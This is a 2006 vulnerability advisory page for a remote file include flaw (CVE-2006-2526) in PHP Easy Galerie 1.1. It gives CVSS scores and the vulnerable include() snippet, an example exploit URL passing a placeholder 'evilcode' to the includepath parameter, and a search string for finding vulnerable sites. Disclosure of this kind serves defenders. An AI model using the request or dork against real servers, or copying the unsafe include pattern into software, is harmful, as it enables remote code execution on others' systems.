Bug: PHP Easy Galerie Index.PHP Remote File Include Vulnerability ( Ascii Version )

Search:
WLB2

PHP Easy Galerie Index.PHP Remote File Include Vulnerability

Published
Credit
Risk
2006.05.24
craziest gmail com
Medium
CWE
CVE
Local
Remote
N/A
CVE-2006-2526
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
6.4/10
4.9/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
None

Vendor: Power-Place

www.power-place.net

(PHP Easy Galerie 1.1)

-------------------------------------------------

Author:Craziest

Contact: craziest(at)gmail(dot)com

Vuln discovered by BrEakerS

--------------------------------------------------

Method:An attacker can exploit this issue to include

an arbitrary remote file containing malicious PHP code and execute

it in the context of the webserver process by

source:

if(isset($includepath)){

include ("$includepath");

http://[url]/gallerypath/index.php?includepath=evilcode

Search:"Power-Place 2003/2004"

--------------------------------------------------------

Greets:Rootshell Security Group

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version